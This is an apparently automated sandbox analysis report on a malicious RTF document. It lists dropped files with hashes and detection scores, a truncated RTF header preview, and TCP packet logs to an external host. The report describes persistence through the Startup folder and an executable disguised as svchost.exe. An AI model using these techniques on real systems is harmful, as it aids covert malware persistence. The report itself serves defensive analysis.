                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YKYB2VKZ9SALOEP6IHD.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83F00AO61JO8JVBNZZNG.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87BC13303IWXGUS4CPWO.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX9LQTWXBI1OLIGT87K1.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G8WMKAIS4RP0UU7V5CJM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KATDANGR9NGCXMK3FXBM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KNRKHEKRLNGFHX3WL0DL.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWITJSS33AUNENZNHP1F.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6I517PCOBHL4J9OQ9E0.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXTSKOASU3HTN9MNZWSX.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WPSOBZIDEVVPSMUD2QNK.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WW5Z4WAT6CR6JFY4TKYI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDKB60LKBB2QYZ2W32L3.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%
                                                  • Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious
                                                  C:\Users\user\Desktop\~$lignright_companyprofile.doc
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, unknown version
                                                  Entropy (8bit):4.113991727574773
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:Allignright_companyprofile.doc
                                                  File size:2960089
                                                  MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
                                                  SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
                                                  SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
                                                  SHA512:4719421697b111049062271caef40709f72e8b32b96b023af71626e5b6d209434bf0eebffdee844fe15e283fdce42ed93d311876818a123562b42c09efa14e6d
                                                  SSDEEP:24576:bs3sSY8fk9mx1nmyuWKNYEDgjfCHw/AMCTIujdqIcfQTWLgmQxKnZpqsmEuyF2w9:S
                                                  File Content Preview:{\rtf8130{\object90153381 90153381 \'' \objautlink92734161\:\objupdate1977406519774065 \objw6282\objh2274{\*\objdata692470 {{{{{{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata692470 } \printim209

                                                  File Icon

                                                  Icon Hash: e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                  0 | 000000EBh | | | | | | | | no
                                                  1 | 000000B0h | | | | | | | | no

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  May 4, 2021 20:31:10.917855024 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917886972 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917907000 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917953968 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.917956114 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.917998075 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918009043 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918035030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918039083 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918072939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918083906 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918112040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918112993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918148994 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918163061 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918188095 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918201923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918225050 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918255091 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918272972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918318033 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918323994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918328047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918354988 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918370962 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918392897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918421984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918431044 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918431997 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.918482065 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.918853998 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949103117 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949148893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949196100 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949242115 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949279070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949316978 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949354887 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949357986 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949423075 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949450016 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949455976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949474096 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949479103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949513912 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949520111 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949553013 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949558020 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949594021 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.949599981 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.949645996 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950144053 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950185061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950206041 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950232029 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950263023 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950273991 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950279951 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950311899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950320959 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950350046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950354099 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950387955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950397015 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950423956 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950433969 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950462103 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950472116 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950499058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950505018 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950542927 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950545073 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950587034 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950591087 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950623989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950629950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950661898 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950666904 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950699091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950709105 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950731039 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950736046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950771093 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950773001 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950778961 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950810909 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950820923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950859070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950865984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950901031 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950905085 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950948000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.950956106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.950994968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951000929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951034069 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951036930 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951070070 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951078892 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951111078 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951122046 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951148987 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951159000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951193094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951195955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951236963 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951242924 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951273918 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951283932 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951316118 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951323986 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951361895 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951369047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951399088 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951409101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951436043 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951447010 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951473951 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951479912 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951510906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951515913 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951549053 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951553106 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951586008 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951592922 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951627970 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951632977 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951675892 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951678038 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951710939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951720953 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951749086 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951755047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951786995 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951791048 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951823950 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.951833010 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.951865911 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.954792976 CEST4916780192.168.2.2252.218.240.113
